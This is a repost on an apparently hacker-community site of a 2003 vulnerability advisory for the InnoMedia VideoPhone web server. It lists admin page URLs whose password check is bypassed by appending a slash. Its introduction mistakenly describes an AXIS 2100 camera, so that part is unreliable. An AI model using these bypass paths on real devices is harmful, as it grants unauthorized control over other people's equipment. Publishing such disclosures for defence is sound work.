|
features post news
(SMS/Articles)
featured download
logged users
active for last 5 minutes
registered users: 19450
There are currently 0 registered users and 23 guests browsing the website.
online chat server:
irc.xor.cx
channel:
#neworderrandom article
quotable quotes OXYGEN324: i just typed what you said and pressed enter, now stuff from my hark disk is missing...
Old Skool NO Boards
NO image gallery Jul 26, 2009
 lol.jpg / other stuff
click on the picture
to enlarge and see description |
|
InnoMedia VideoPhone Authorization Bypass
@ Exploits -> Other
Feb 28 2004, 22:14 (UTC+0) | furcalor writes: #######################################################################
Application: InnoMedia VideoPhone
Server: GoAhead-Webs
Vendors: InnoMedia Pte Ltd
GoAhead Ltd
http://www.innomedia.com/
http://www.goahead.com/
Versions: au75200xvi04010x
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bugs
3) The Code
#######################################################################
===============
1) Introduction
===============
The AXIS 2100 Network Camera offers crisp, quality images and streaming
video
from anywhere on your network. It lets you keep a close eye on the world
around
you, or show your part of it through the Web.
With a built-in high performance Web server, no PC is required. The network
camera
can operate as a standalone or be placed wherever there is a LAN or Internet
connection,
or an available modem.
#######################################################################
======
2) Bug
======
Browsing the server normally
http:///
Will show some info about the server.
The server's menu appears on the left side and contains a few links
to protected files, which setup the server's settings/configuration.
When refering to any of the menu's "protected" links, such as:
http:///videophone_admindetail.asp
A "Basic Authorization" request pops up.
This authorization can be easily bypassed by refering to the same file as a
folder.
http:///videophone_admindetail.asp/
#######################################################################
===========
3) The Code
===========
http:///videophone_admindetail.asp/
http:///videophone_syscfg.asp/
http:///videophone_upgrade.asp/
http:///videophone_sysctrl.asp/
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
|
| Top of page
|
